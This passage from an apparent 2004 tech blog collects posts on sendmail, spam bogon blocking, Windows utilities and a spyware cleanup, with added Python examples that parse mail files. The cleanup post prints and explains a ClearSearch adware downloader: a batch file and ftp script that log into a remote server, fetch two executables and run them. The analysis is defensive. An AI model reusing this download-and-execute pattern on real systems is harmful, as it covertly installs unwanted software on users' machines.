\liz... deliverable: mailer local, user \liz
liz-smith@starwars.com... deliverable: mailer esmtp, host starwars.com., user liz-smith@starwars.com

When you are forwarding email, you need to be careful not to create an infinite loop, e.g. where email is forwarded to an account that forwards it again to the original account.
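The two failure modes described above, a .forward file that others can write to and a forwarding loop between accounts, can be checked with a short script. The code below is an added example, not part of the original post; the function names, the host name mail.example.test and the second account "bob" are constructed for illustration, and the parser handles plain addresses only.

```python
import os
import stat
import tempfile


def parse_forward(text):
    """Return the delivery targets in a .forward file (commas or newlines separate them)."""
    targets = []
    for line in text.splitlines():
        targets.extend(t.strip() for t in line.split(",") if t.strip())
    return targets


def permission_problems(path):
    """List mode bits that would let someone else rewrite where the mail goes."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    problems = []
    if mode & stat.S_IWGRP:
        problems.append("group-writable")   # the chmod 664 case the post warns about
    if mode & stat.S_IWOTH:
        problems.append("world-writable")   # assumption: treated like group write here
    return problems


def next_hops(user, forwards, host):
    """Local accounts that mail for `user` is handed to next."""
    hops = []
    for target in forwards.get(user, []):
        if target.startswith("\\"):
            continue                        # "\user": deliver to the mailbox, stop forwarding
        name, _, domain = target.partition("@")
        if domain and domain != host:
            continue                        # leaves this host, cannot be followed from here
        hops.append(name)
    return hops


def find_loop(start, forwards, host):
    """Return the chain of accounts that leads back to itself, or None."""
    path = []

    def walk(user):
        if user in path:
            return path[path.index(user):] + [user]
        path.append(user)
        for nxt in next_hops(user, forwards, host):
            loop = walk(nxt)
            if loop:
                return loop
        path.pop()
        return None

    return walk(start)


def audit_demo():
    """Write a sample .forward, check it at mode 664 and again at 644."""
    with tempfile.TemporaryDirectory() as home:
        path = os.path.join(home, ".forward")
        with open(path, "w") as fh:
            fh.write("\\liz, liz-smith@starwars.com\n")
        os.chmod(path, 0o664)
        before = permission_problems(path)
        os.chmod(path, 0o644)
        after = permission_problems(path)
        with open(path) as fh:
            targets = parse_forward(fh.read())
    return before, after, targets


# Constructed .forward contents for accounts on one host (hypothetical host name).
HOST = "mail.example.test"
SAFE = {"liz": ["\\liz", "liz-smith@starwars.com"]}
LOOPING = {"liz": ["\\liz", "bob"], "bob": ["liz"]}

if __name__ == "__main__":
    print(audit_demo())
    print(find_loop("liz", SAFE, HOST))
    print(find_loop("liz", LOOPING, HOST))
```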

References:

  1. Mail forwarding using .forward files

[/network/email/sendmail] permanent link

Tue, Jul 13, 2004 9:16 pm

Flash Support Detection

If you need to know whether a web browser supports Macromedia's Flash format, Colin Moock provides a script at http://moock.org/webdesign/flash/detection/moockfpi/, which you can use on your web server to determine whether a visitor to your site has Flash support in his or her browser and whether the version of Flash supported is the currently available version. As he notes on his website, Flash detection methods can't provide 100% certainty. He estimates that you may be able to reach a certainty of 90% to 97%.

I've included his code on a webpage at the link below that you can use to test whether a browser on a particular system has support for Flash.

Flash Support Test

[/network/web/browser] permanent link

Mon, Jul 12, 2004 5:17 pm

PowerPoint Viewer

For those who may need to view or print a PowerPoint presentation, but don't need the capability to create or edit PowerPoint presentations, Microsoft offers a free PowerPoint viewer.

Links to download viewers for other Office applications can be found at Microsoft Office Converters and Viewers.

Viewer: PowerPointViewer 97
Download Size: 2789 KB
Date Published: 2/20/2004
Version: 2000
Requirements:

Comments: for users who don't have Microsoft PowerPoint®; it allows them to view PowerPoint 95, 97, 2000, and 2002 presentations. This PowerPoint viewer supports all PowerPoint 95 and PowerPoint 97 features, but the following PowerPoint 2000 and 2002 features are not supported:

Viewer: PowerPoint 2003 Viewer
Download Size: 1911 KB
Date Published: 9/15/2003
Version: 1
Requirements: Windows 2000 Service Pack 3, Windows 98 Second Edition, Windows ME, Windows Server 2003, or Windows XP
Comments: The Microsoft Office PowerPoint 2003 Viewer lets you view full-featured presentations created in PowerPoint 97 and later versions. The PowerPoint 2003 Viewer also supports opening password-protected Microsoft PowerPoint presentations. This viewer doesn't support the following features:


If you don't have Service Pack 3 or later on a Windows 2000 system, you should use the PowerPointViewer 97. You can check which service pack you have installed by clicking on Start, Run, and then typing Winmsd. The system summary will show you the OS Name and the Version. If you don't see Service Pack 3 or later listed next to the version for a Windows 2000 system, then use the earlier PowerPoint viewer.

[/os/windows/office/powerpoint] permanent link

Sat, Jun 12, 2004 9:12 pm

Instructions for Updating Bazooka Adware and Spyware Scanner Database Manually

Bazooka Adware and Spyware Scanner has an update button in the program, but if you need to manually update Bazooka's adware/spyware database the steps are listed below. You may want to use this method to download the database from the author's website, if you have multiple systems you need to update and don't want to download the same file many times or if you have an infected system that you want to keep off-line until you have removed adware/spyware from it.

  1. Shut down Bazooka if it is running.
  2. Download the latest database from http://www.kephyr.com/spywarescanner/bazooka_db.bdb
  3. Save the new database file at the same location using the same name as the old database file. The old database is called "bazooka_db.bdb" and, if the default location was chosen when the program was installed, will be located in "C:\Program Files\Bazooka Adware and Spyware Scanner\system\".
  4. Start Bazooka.

If you cannot find the old database, search for "bazooka_db.bdb" on all your hard drives by clicking on "Start" and then selecting "Search" to have your system locate it.

When you start the program, it tells you how old your current database is at that moment. You will see something like "Your Bazooka database is 31 days old, detecting 335 spywares."

Though the program is freeware, if you haven't made a donation to the author, remember it takes a lot of time and effort to provide such software and it costs the author to maintain a website. And it is truly free, not like some of the programs you may have downloaded that came with adware and/or spyware requiring you to seek software such as this to free you from the misery of poor performance and system instability brought on by the installation of those other programs. Though Bazooka doesn't automatically remove the adware/spyware software like some other programs do, I've found it finds adware/spyware that other programs miss. And, if you run Bazooka after you run some other adware/spyware removal programs, you may find that Bazooka still reports some adware/spyware on the system that you thought you removed. Another adware/spyware removal tool may have removed most of an adware/spyware program, effectively stopping it from harming your system, but sometimes they leave a few remnants behind, such as registry entries or files. If you peruse Bazooka's manual removal instructions, you can find these remnants and remove them from your system.

References:

  1. Manual database update instructions

[/security/spyware/bazooka] permanent link

Thu, Jun 10, 2004 1:52 pm

How to Determine the Long Distance Carrier on a Line

You can determine the long distance provider for a phone line by calling 1-700-555-4141 from the telephone you wish to check. You will hear an announcement telling you the name of the carrier.

[/phone] permanent link

Thu, Jun 03, 2004 12:25 pm

Sun May Adopt the Open-Source Model for Solaris

Pressure from Linux is apparently continuing to push Sun into moving its proprietary version of Unix, Solaris, to the open-source model for software distribution. A June 2, 2004 article titled "Solaris goes open-source" appearing in Government Computer News quotes company president and chief operating officer Jonathan Schwartz as stating that Sun intends to "create a rich, open environment" around Solaris.

Sun has been talking about such a move for years as shown by an August 28, 2002 article by David Berlind titled "Unplugged: Sun chief engineer Rob Gingell, Part II". On page 2 of the article there is a discussion between the author and Rob Gingell, Sun's chief engineer at the time, about Solaris and the open-source model.

References:

  1. Solaris goes open-source
    By Susan M. Menke
    Date: June 2, 2004

  2. Unplugged: Sun chief engineer Rob Gingell, Part II
    By David Berlind
    Date: August 28, 2002

[/os/unix/solaris] permanent link

Mon, May 10, 2004 8:36 pm

Bogon Block

I received an email today advertising "FDA approved druugs". This spam message was filled with misspellings, e.g. "Special Offeer for limiteed time only", "Saave upt to 70% now", and "Clickk heree to saave 70%+", a technique spammers use in an effort to bypass spam filters which look for common phrases often found in spam. When I checked the originating IP address in the email headers, I saw an IP address of 77.119.208.80. I checked that address in a number of block lists without finding it listed. However, when I tried dr. Jorgen Mash's DNS database list checker, I found the address listed as a "bogon".

A bogon is an IP address that should not normally be routed on the Internet. Some address blocks, e.g. the private address block 192.168.xxx.xxx, are not normally routed on the Internet, because they are reserved for special uses. The Bogon IPs webpage provides a means to check on whether a particular address is a bogon. The List of all Bogon IPs in Netrange format shows that the range 71.0.0.0 - 79.255.255.255 contains unallocated or reserved address space. And the Internet Assigned Numbers Authority, which is the organization that allocates IP address space, lists addresses beginning with 77 as reserved addresses. So I should not be seeing this address as a source IP address for an email address. The fact that it is listed as the origination point for the message indicates it is likely from a system being used for dubious purposes, such as the transmission of spam.

The Completewhois Project provides a DNS block list bogons.dnsiplists.completewhois.com that can be used with sendmail to automatically block email from bogons. They also provide other subsets of the complete block list, which are listed on their Using IP Lists page.

I added their block list to those I have sendmail check each incoming message against by taking the following steps:

  1. I added the following line beneath the FEATURE(`blacklist_recipients')dnl line in /etc/mail/sendmail.mc:

    FEATURE(`dnsbl', `bogons.dnsiplists.completewhois.com', `"550 Mail from " $`'&{client_addr} " refused see http://www.completewhois.com/bogons/"')dnl

  2. I then issued the command below

    m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf

  3. I then stopped and restarted sendmail with the command below

    /etc/init.d/sendmail restart
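To show what the dnsbl check does with the connecting address, the added example below (not part of the original post) takes the client IP from the topmost Received header of a constructed message, builds the name a DNS block list lookup would query in the zone named above, and tests the address against a small constructed snapshot of the ranges the post mentions. The function names, the sample message and the snapshot table are assumptions of this example; sendmail itself performs the check at connection time against ${client_addr}, not from headers.

```python
import email
import ipaddress
import re

DNSBL_ZONE = "bogons.dnsiplists.completewhois.com"   # zone named in the post

# Constructed snapshot: the two ranges the post mentions, as they stood in 2004.
# Allocations change, so a static table like this goes stale; querying a
# maintained DNS list avoids having to refresh it by hand.
BOGON_SNAPSHOT = [
    ("192.168.0.0", "192.168.255.255", "private address block"),
    ("71.0.0.0", "79.255.255.255", "unallocated or reserved (2004 list)"),
]

# Constructed message. The top Received line is the one our own server wrote.
SAMPLE_MESSAGE = """\
Received: from dsl.example.test (unknown [77.119.208.80])
\tby mx.example.test with ESMTP id CONSTRUCTED01;
\tMon, 10 May 2004 20:31:02 -0400
Received: from inside.example.test ([192.0.2.7])
\tby dsl.example.test; Mon, 10 May 2004 20:30:58 -0400
From: sender@example.test
Subject: Special Offeer for limiteed time only

body
"""

BRACKETED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def client_address(raw_message):
    """IP of the host that connected to us: the bracketed address in the topmost
    Received header. Lower headers were supplied by the sender and can be forged."""
    received = email.message_from_string(raw_message).get_all("Received") or []
    for header in received[:1]:
        match = BRACKETED_IP.search(header)
        if match:
            return str(ipaddress.IPv4Address(match.group(1)))
    return None


def dnsbl_query_name(ip, zone=DNSBL_ZONE):
    """DNS block list lookups reverse the octets and append the list's zone.
    A listed address resolves; an unlisted one returns NXDOMAIN."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def snapshot_reason(ip, snapshot=BOGON_SNAPSHOT):
    """Offline stand-in for the DNS answer: why the snapshot lists ip, or None."""
    addr = ipaddress.IPv4Address(ip)
    for first, last, reason in snapshot:
        if ipaddress.IPv4Address(first) <= addr <= ipaddress.IPv4Address(last):
            return reason
    return None


def check_message(raw_message):
    """Report the client address, the DNSBL name to query and the SMTP reply
    the sendmail.mc line in the post would produce for a listed address."""
    ip = client_address(raw_message)
    if ip is None:
        return None
    reason = snapshot_reason(ip)
    reply = None
    if reason:
        reply = f"550 Mail from {ip} refused see http://www.completewhois.com/bogons/"
    return {"client": ip, "query": dnsbl_query_name(ip), "reason": reason, "reply": reply}


if __name__ == "__main__":
    print(check_message(SAMPLE_MESSAGE))
```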

References:

  1. Bogon IPs
  2. Internet Protocol V4 Address Space

[/network/email/spam] permanent link

Thu, Apr 22, 2004 6:27 pm

Sharing Folders with Net Folders

Microsoft Outlook 98 and 2000 provide the capability for you to share your calendar, contact lists, and other folders with others using Outlook. This can be very helpful for small offices that don't want to purchase Exchange Server or Microsoft's Small Business Server 2003 software. I've provided some basic instructions for how to use Microsoft Outlook's Net Folders feature to do so.

[/os/windows/office/outlook] permanent link

Mon, Apr 19, 2004 3:28 pm

Determining Your IP Address

If you need to determine the IP address systems on the Internet will see as your address, you can go to any of the following sites:
  1. WhatIsMyIP.com
  2. WhatIsMyIP.org
  3. Canadian Web Solutions
  4. internet-help.net (click on the Quick-Find link)

Keep in mind that address is not necessarily the IP address assigned to your computer if you are on a Local Area Network (LAN). If you are behind a firewall or a router performing Network Address Translation (NAT), your locally assigned address may differ from the address websites and other servers on the Internet see as your originating address. If your router is performing NAT, there may be multiple computers behind the router with unique IP addresses, but the router may have only one outside IP address. The router keeps track of which connections are associated with which inside IP addresses.

You can determine your system's actual address by going to What is my IP Address?. Or, if you are using a PC running Windows, you can open a command prompt by clicking on Start, Run, and then typing command and hitting Enter. Then type ipconfig, which will show you your IP address, your subnet mask, and the default gateway address, which is the address of the system, e.g. a router, that your system would use to gain access to the Internet. On a Linux system, if you are logged on as root, you can type ifconfig -a, then look for the "inet addr" value, which will usually be associated with the eth0 interface. The lo interface is a "loopback" address of 127.0.0.1, which is just an address that allows a system to communicate with itself.

[/network/Internet/IP] permanent link

Tue, Apr 13, 2004 8:39 pm

Mailq Out of Memory Errors

If you run the mailq command and see an "Out of memory" error as in the following example, then the recipient's email server is experiencing a memory problem.

----Q-ID---- --Size-- -----Q-Time----- ------------Sender/Recipient------------
i3DILcw21033     3415 Tue Apr 13 14:21 <eliza@ninsol.com>
                 (Deferred: 452 4.3.1 Out of memory)
                                       <MWalsh@cmflines.com>

You will likely see corresponding sendmail entries in your mail log file, e.g. /var/log/maillog.

Apr 13 17:49:06 gna sendmail[21965]: i3DILcw21033: to=<MWalsh@cmflines.com>, ctladdr=<eliza@ninsol.com> (106/100), delay=03:27:27, xdelay=00:00:00, mailer=esmtp, pri=393958, relay=mail2.cmflines.com. [63.208.156.193], dsn=4.0.0, stat=Deferred: 452 4.3.1 Out of memory
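The log entry carries enough detail to tell a refusal by the remote server from a failure to reach it at all: an SMTP reply code in the stat field (452 here) means the relay named in relay= answered and deferred the message. The added example below, which is not part of the original post, parses the entry quoted above together with two constructed entries and groups the deferrals by relay; the function and field names are chosen for this example.

```python
import re
from collections import defaultdict

# The first line is the entry quoted in the post; the other two are constructed.
SAMPLE_LOG = """\
Apr 13 17:49:06 gna sendmail[21965]: i3DILcw21033: to=<MWalsh@cmflines.com>, ctladdr=<eliza@ninsol.com> (106/100), delay=03:27:27, xdelay=00:00:00, mailer=esmtp, pri=393958, relay=mail2.cmflines.com. [63.208.156.193], dsn=4.0.0, stat=Deferred: 452 4.3.1 Out of memory
Apr 13 17:50:10 gna sendmail[21970]: i3DLoAw21969: to=<user@example.test>, delay=00:00:02, xdelay=00:00:01, mailer=esmtp, pri=30512, relay=mx.example.test. [192.0.2.25], dsn=2.0.0, stat=Sent (OK queued)
Apr 13 18:02:44 gna sendmail[22001]: i3DM2aw22000: to=<other@example.test>, delay=00:00:30, xdelay=00:00:30, mailer=esmtp, pri=30480, relay=mx2.example.test., dsn=4.0.0, stat=Deferred: Connection timed out with mx2.example.test.
"""

ENTRY = re.compile(r"^\w{3}\s+\d+\s[\d:]{8}\s\S+\ssendmail\[\d+\]:\s(\w+):\s(.*)$")
FIELD_SEP = re.compile(r",\s(?=\w+=)")          # commas inside a value are left alone
RELAY = re.compile(r"^(\S+?)\.?(?:\s\[([\d.]+)\])?$")
SMTP_REPLY = re.compile(r"^Deferred: (\d{3}) (\d\.\d+\.\d+) (.+)$")


def parse_entry(line):
    """Split one sendmail delivery line into its queue id and key=value fields."""
    match = ENTRY.match(line)
    if not match:
        return None
    fields = {"qid": match.group(1)}
    for part in FIELD_SEP.split(match.group(2)):
        key, sep, value = part.partition("=")
        if sep:
            fields[key] = value
    return fields


def deferrals(log_text):
    """Group deferred deliveries by relay and record who reported the problem."""
    by_relay = defaultdict(list)
    for line in log_text.splitlines():
        fields = parse_entry(line)
        if not fields or not fields.get("stat", "").startswith("Deferred"):
            continue
        relay = RELAY.match(fields.get("relay", ""))
        host, ip = relay.groups() if relay else (None, None)
        reply = SMTP_REPLY.match(fields["stat"])
        by_relay[host].append({
            "qid": fields["qid"],
            "to": fields.get("to"),
            "ip": ip,
            "code": reply.group(1) if reply else None,
            "enhanced": reply.group(2) if reply else None,
            "text": reply.group(3) if reply else fields["stat"],
            # An SMTP reply means the relay answered; without one, our side gave up.
            "reported_by": "remote" if reply else "local",
        })
    return dict(by_relay)


if __name__ == "__main__":
    for relay_host, items in deferrals(SAMPLE_LOG).items():
        print(relay_host, items)
```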

[/network/email/sendmail] permanent link

Sun, Apr 04, 2004 11:12 pm

Procedure for Generating Norton Ghost Bootable CD

I've found Norton Ghost to be very useful for backing up systems. The program will allow you to back up an exact image of a drive or partition. It will work with FAT, FAT32, NTFS, ext2, and some versions will even allow you to backup ext3 partitions.

A problem I've encountered is that the program only allows you to generate bootable diskettes. Some newer systems don't have a floppy drive. A boot CD is needed for those systems. For those systems, generate a bootable floppy diskette of the type you want, e.g. with USB and Firewire support or for a network backup. Then use a CD writing program to generate a bootable CD. Many newer CD burning programs allow you to generate bootable CDs from a bootable floppy.

The procedure I've listed below is for Roxio's Easy CD and DVD Creator 6, but you should be able to use a similar procedure with another program, e.g. Nero.

  1. Start Creator Classic
  2. Click on File
  3. Click on New Project
  4. Select Bootable Disc
  5. Make sure Bootable Disc Type is set to Floppy Disk Emulation (1.44 MB) and Emulation Option is set to Generate Image from Floppy. You can uncheck Retain Boot Image File unless you want to generate more bootable discs in the future without reinserting the floppy (see Figure 1). You can leave the Advanced options set to the default of 0x7c0 for Load Segment and 1 for Sector Count
  6. Click on OK
  7. Click on the orange "burn" button at the lower right-hand side of the Creator Classic window
  8. A Record Setup window then appears. Unless you need to change any settings, just click on OK
  9. You will see a Burn Disc Progress window appear. When the process reaches 100%, you will see a message that "You new disc is complete." Unless you want to use Creator Classic to create a label, click on Close then OK.
  10. When the message appears asking whether you want to save project changes, you can click on No unless you want to generate more CDs exactly like the one you just generated.
  11. You can now close Creator Classic and use the boot CD you just created to boot a system into Norton Ghost.

If the system isn't configured to try booting from a bootable CD before attempting to boot from the hard disk, you will need to enter the BIOS setup routine, which you can do after you power the system on, by hitting the appropriate key, e.g. Del (Dell) or F1 (Gateway). Or many newer systems will allow you to hit a key at startup time to specify what device you want to boot from, e.g. F12 (Dell) or F10 (Gateway).

[/os/windows/utilities/backup/ghost] permanent link

Wed, Mar 31, 2004 5:07 pm

Solaris Version Numbering

Sun's operating system versioning scheme has seemed confusing to me, since the same operating system version may be referred to with different version numbers. An explanation of Sun's numbering scheme for Solaris can be found at Sun Versus Linux: The x86 Smack-down where the following explanation can be found:

After Solaris 2.6, Sun decided to change how it named each Solaris version. The next version was Solaris 2.7, but Sun called it simply “Solaris 7”. Solaris 8 is actually 2.8, and Solaris 9 is 2.9. They are sometimes still referred to by the old nomenclature (i.e. 2.7), especially when dealing with porting and software versioning.

A bit confused? I've still got more! Solaris versions are also sometimes referred to as SunOS, and different numbering schemes apply there as well. SunOS was the original operating system released by Sun in 1981 and is based on BSD, where Solaris is based on SVR4 Unix (System V). The last version of SunOS was 4.1.4, which would make Solaris 2.0 (Solaris started at 2.0) SunOS 5.0. So Solaris 9 is also known as Solaris 2.9 and also known as SunOS 5.9.

The article by Tony Bourke also offers a comparison of Linux and Solaris.

Another good source of information on Solaris version naming is the Wikipedia SunOS article.

[/os/unix/solaris] permanent link

Sun, Mar 28, 2004 10:20 pm

Windows 98 System Hanging After Login

My mother-in-law told me her Windows 98 PC hangs after she enters her name and password to log into it. She said that even if she waits a long time, she can't get any further. Rebooting the system puts it back in the same state.

When I tested the system, I found I could bring up the Windows Explorer with Ctrl-Alt-Del, which showed the following tasks.

Explorer
Starter
Systray
Scanregw

I ended the Scanregw task, but that didn't help and then I couldn't even bring up the task list again. I rebooted and logged in with my wife's userid and password. When I brought up the task list, again I saw the same tasks, but this time I saw "Not responding" listed after Explorer. I ended the Windows Explorer task and then the system appeared to perform normally. However, when I opened Windows Explorer, I saw "Finalizing installation" continually scrolling across Windows Explorer directly beneath the address bar.

The antivirus program wasn't shown in the system tray. When I went looking for the program with the Windows Explorer, I saw a Hotbar folder under the Program Files folder. I've encountered problems with this adware/spyware program on other systems and would not leave it on any PC I support.

The company that produces this adware/spyware claims "Hotbar enhances and personalizes your Internet & email applications" and can "make your emails unique with hundreds of animations, backgrounds and more" and allows you to "design & send FREE eCards from your existing email". They also state that Hotbar will "brighten your browser with colorful images & enhance your surfing experience with Smart Buttons!" But their "free" software comes with an unseen price tag. This software is likely to significantly impair the performance and stability of your system.

If you click on the Terms of Use and License link you will find the following:

HOTBAR COLLECTS AND STORES INFORMATION ABOUT THE WEB PAGES YOU VIEW AND THE DATA YOU ENTER IN SEARCH ENGINE SEARCH FIELDS WHILE USING THE SOFTWARE. HOTBAR USES THIS INFORMATION TO DETERMINE WHICH ADS AND BUTTONS TO DISPLAY ON YOUR HOTBAR TOOLBARS AND WHICH ADS TO SHOW YOUR BROWSER.

So you are subjecting yourself to "targeted" popup ads, if you install the software.

Hotbar.com states that you can use Windows control panel Add/Remove Programs option to rid yourself of this software by opting to remove Outlook Tools by Hotbar, Web Browser Tools by Hotbar, and Shopper Reports Adapter. Or you can download an uninstaller from the company's website at http://hotbar.com/downloads/HbUninst.exe. Instructions on how to manually remove the software can be found at http://www.kephyr.com/spywarescanner/library/hotbar/index.phtml. I usually rely on Spybot Search & Destroy to rid systems of adware and spyware. Spybot is a free adware/spyware detection and removal program, though you should make a donation to the developer to ensure he can continue to maintain and develop such a worthwhile program.

I also use Bazooka Adware and Spyware Scanner from Kephyr to locate adware/spyware on systems. It is also free, but you really should consider making a donation to help the developer continue his work. Bazooka Adware and Spyware Scanner does an excellent job detecting such software, but can't automatically remove such software. However, the developer does provide instructions on manually removing such software. I've found that Spybot and other adware/spyware removal tools, though they disable and remove most of the bits and pieces of adware/spyware they detect, sometimes will still leave a few files, registry entries, etc. that Bazooka will detect. I can then use the manual removal instructions on the Kephyr website to remove the last remnants of the programs.

I started a Spybot Search & Destroy scan of the system. Spybot found the following adware/spyware.

ClearSearch.Net
Comet Cursors
DSO Exploit
Hotbar
Lycos.SideSearch
Test - Browser Helper Object (BHO)
VX2/e
VX2/f
VX2/h.ABetterInternet

Interestingly, the PestPatrol webpage on ClearSearch reports that "Every time the computer is started, ClearSearch will remove the search-hijacking part of Xupiter, HuntBar/MSLink, CommonName, NewDotNet, the iWon toolbar/search assistant and Netword." So apparently the software will eliminate portions of competing adware/spyware.

I had Spybot remove all of the adware/spyware it found. Spybot couldn't remove all of it immediately, so I rebooted it to let it remove the rest of it at startup. However, the system hung again after Spybot completed its work. I used Ctrl-Alt-Del again and saw a list similar to what I had seen previously.

Explorer
Systray
Scanregw
Rundll32
Starter

I chose to shut down the system, but the system didn't shut down and I couldn't bring up the task list with Ctrl-Alt-Del again. I had to power the system off and on. When I logged in again, I didn't experience the problem with the system hanging. But when I ran Spybot again to make sure that it wasn't seeing any adware/spyware, it reported two registry keys still existed for Hotbar. I had it "fix selected problems" again and then repeated the scan. This time it reported "no immediate threats were found".

As an added precaution, I installed Ad-aware 6.0 on the system. Ad-aware is available in three versions. The standard version is free for non-commercial use. If you wish to have real-time monitoring and blocking capabilities to prevent adware/spyware being installed, purchase one of the other versions. They are relatively inexpensive given the time and aggravation they can spare you by preventing adware/spyware from being installed and subsequently causing crashes, freezes, etc. on your system.

Ad-aware reported it found 28 processes and 149 objects associated with adware/spyware on the system. It isn't unusual for a particular adware/spyware detection program to find adware/spyware that another program has missed or at least some files and registry entries associated with adware/spyware that remain even though the adware/spyware has been rendered ineffective. I've run Spybot after running Ad-aware on systems and found it has detected things that Ad-aware has missed. I usually run Ad-aware, Bazooka Adware and Spyware Scanner, and Spybot Search & Destroy on systems to ensure that no adware/spyware is left on a system. Be sure to update the programs' reference files so that you ensure you are checking for recently detected adware/spyware before you run checks on a system.

Ad-aware reported a number of tracking cookies, which I'm not as concerned about, but objects associated with the adware/spyware listed below were found as well. I'm not concerned about Ad-aware finding Alexa, since the Alexa toolbar isn't installed. Even if a system doesn't have the Alexa toolbar installed, you will likely see Alexa reported by Ad-aware, since it comes bundled with Internet Explorer. The Adware and Under-Wear - The Definitive Guide article has further information on Alexa, as well as other adware/spyware. The article states that in 2001 a $1.9 million fine was levied against the company responsible for Alexa for violating users' privacy.

Alexa
ClearSearch
CometCursor
Coulomb Dialer
HotBar
VX2.BetterInternet
FavoriteMan
WinPup32

Ad-aware reported "Some objects could not be removed" and asked if I wanted to let Ad-aware remove them after the next reboot. The only one it reported was c:\program files\clearsearch\ie_clrsch.dll. I instructed it to remove the object after the next reboot and then rebooted the system. Ad-aware completed its check when the system booted and I reran the program yet again for good measure. This time the program didn't find any adware/spyware, reporting "0 New objects" were found.

There are still four items on the desktop that I believe are associated with ClearSearch, though. The file names are as follows:

o
o.bat
ClrSchP028.exe
Calsdr.exe

The batch file o.bat contained the following lines:

if not exist C:\WINDOWSstatuslog ftp -s:o
if exist ClrSchP028.exe ClrSchP028.exe
if exist calsdr.exe calsdr.exe

The first line checks to see if the file WINDOWSstatuslog exists in C:\. If the file doesn't exist, the File Transfer Protocol (FTP) program that comes with Windows is started. The "-s" specifies that a script should be executed (you can see other options by typing "ftp -h" at a command prompt). The script is a text file with the name of the file following the colon. In this case the name of the file is "o". After the first line is executed, the batch file will check to see if ClrSchP028.exe and calsdr.exe exist and will execute them if they exist. By checking for their existence first, the batch file avoids the display of an error message by your system.

Looking at the contents of the file titled "o", I see the following:

open downloads.default-homepage-network.com
tmpacct
12345
bin
get ClrSchP028.exe
get calsdr.exe
bye

The first line tells the ftp program to open a connection to the system downloads.default-homepage-network.com. An FTP server will prompt for a userid and password. So the second line transmits a userid of "tmpacct" and the following line transmits the password "12345". On the next line, the "bin" command sets the file transmission mode to use binary rather than text transmissions. That command is needed to ensure that there is no attempt to translate end of line markers in files transmitted. The next two "get" commands instruct the FTP server to transmit the two programs, ClrSchP028.exe and calsdr.exe. The last line terminates the connection to the FTP server.
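The same reading of the two files can be automated when cleaning up a system: the added example below (not part of the original post) parses o.bat and the ftp script "o" exactly as quoted above, recovers the server and login the script uses, and reports which downloaded files the batch file then runs. The function names are chosen for this example, and the parser covers only the commands that appear in these two files plus the optional local name on "get".

```python
import re

# The two files exactly as quoted in the post.
O_BAT = r"""if not exist C:\WINDOWSstatuslog ftp -s:o
if exist ClrSchP028.exe ClrSchP028.exe
if exist calsdr.exe calsdr.exe
"""

O_SCRIPT = """open downloads.default-homepage-network.com
tmpacct
12345
bin
get ClrSchP028.exe
get calsdr.exe
bye
"""

FTP_CALL = re.compile(r"\bftp\b.*?-s:(\S+)", re.IGNORECASE)
IF_EXIST = re.compile(r"^if\s+(?:not\s+)?exist\s+\S+\s+(.+)$", re.IGNORECASE)


def parse_batch(text):
    """Find ftp -s:<script> calls and the programs the batch file starts."""
    ftp_scripts, executed = [], []
    for line in text.splitlines():
        line = line.strip()
        guarded = IF_EXIST.match(line)
        action = guarded.group(1) if guarded else line
        call = FTP_CALL.search(action)
        if call:
            ftp_scripts.append(call.group(1))
        elif action:
            executed.append(action.split()[0].lower())
    return {"ftp_scripts": ftp_scripts, "executed": executed}


def parse_ftp_script(text):
    """Recover server, login and transfers from an ftp -s script."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    info = {"host": None, "user": None, "password": None,
            "binary": False, "downloads": []}
    i = 0
    while i < len(lines):
        words = lines[i].split()
        command = words[0].lower()
        if command == "open" and len(words) > 1:
            info["host"] = words[1]
            # The next two lines answer the server's userid and password prompts.
            if i + 2 < len(lines):
                info["user"], info["password"] = lines[i + 1], lines[i + 2]
                i += 2
        elif command in ("bin", "binary"):
            info["binary"] = True
        elif command in ("get", "recv") and len(words) > 1:
            # "get remote [local]": the local name is what lands on disk.
            info["downloads"].append(words[2] if len(words) > 2 else words[1])
        i += 1
    return info


def download_and_execute(batch_text, script_files):
    """Pair each ftp script the batch file runs with the fetched files it then starts."""
    batch = parse_batch(batch_text)
    findings = []
    for name in batch["ftp_scripts"]:
        if name not in script_files:
            continue
        ftp = parse_ftp_script(script_files[name])
        fetched = {f.lower() for f in ftp["downloads"]}
        findings.append({
            "script": name,
            "host": ftp["host"],
            "user": ftp["user"],
            "password": ftp["password"],
            "binary": ftp["binary"],
            "fetched_then_run": [exe for exe in batch["executed"] if exe in fetched],
        })
    return findings


if __name__ == "__main__":
    for finding in download_and_execute(O_BAT, {"o": O_SCRIPT}):
        print(finding)
```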

So, if the two files were received from the FTP server they will be executed by the o.bat batch file. Looking at the ClrSchP028.exe file with FileAlyzer, a tool available from the developer of Spybot Search & Destroy, which will allow one to analyze the contents of files, I see there is a company name, Clear Search, listed in the file (see Figure 1). Using FileAlyzer's hex dump capability, I looked for text in the file. I see the program will attempt to contact sds.clrsch.com for updates (see Figure 2).

I deleted the four ClearSearch files from the desktop by right-clicking on them and choosing "delete".

If you have a question about whether a program is spyware you can go to Spychecker and enter the name of the program in its search field. The site also has links to a number of anti-spyware tools. You can also check on a file using Kephyr's searchable database.

I updated the Norton Antivirus 2000 virus definitions and checked the system with that program as well. It found a Trojan on the system, which it quarantined.

Name Virus
do.exe Download.Trojan

While I was checking the folders under C:\Program Files, I noticed there was a C:\Program Files\ClearSearch folder still on the system. The only file in it, IE_ClrSch.DLL, is a 78 KB file dated 3/22/04 8:13 PM. When I tried to remove the file, I received a message that "the specified file is being used by Windows." I ran another Ad-aware scan, which found ClearSearch again. It reported the following for ClearSearch:

Vendor       Type      Category    Object
ClearSearch  Regkey    Data Miner  HKEY_LOCAL_MACHINE:SOFTWARE\CLRSCH
ClearSearch  RegValue  Data Miner  HKEY_CURRENT_USER:Software\Microsoft\Internet Explorer\URLSearchHooks\
ClearSearch  Folder    Data Miner  c:\program files\ClearSearch\
ClearSearch  File      Data Miner  c:\program files\clearsearch\ie_clrsch.dll

When I requested Ad-aware remove the adware/spyware it found, it reported the following:

Some objects could not be removed.
Try closing all open browser windows prior to the removal
If this does not help, reboot and run Ad-aware again.

C:\program files\clearsearch\ie_clrsch.dll

I had two Internet Explorer windows open while I was running Ad-aware, which might have led to the message. When I rebooted and Ad-aware ran again, it reported it didn't detect any more adware/spyware after it ran. But the ClearSearch folder and ie_clrsch.dll file were still on the system.

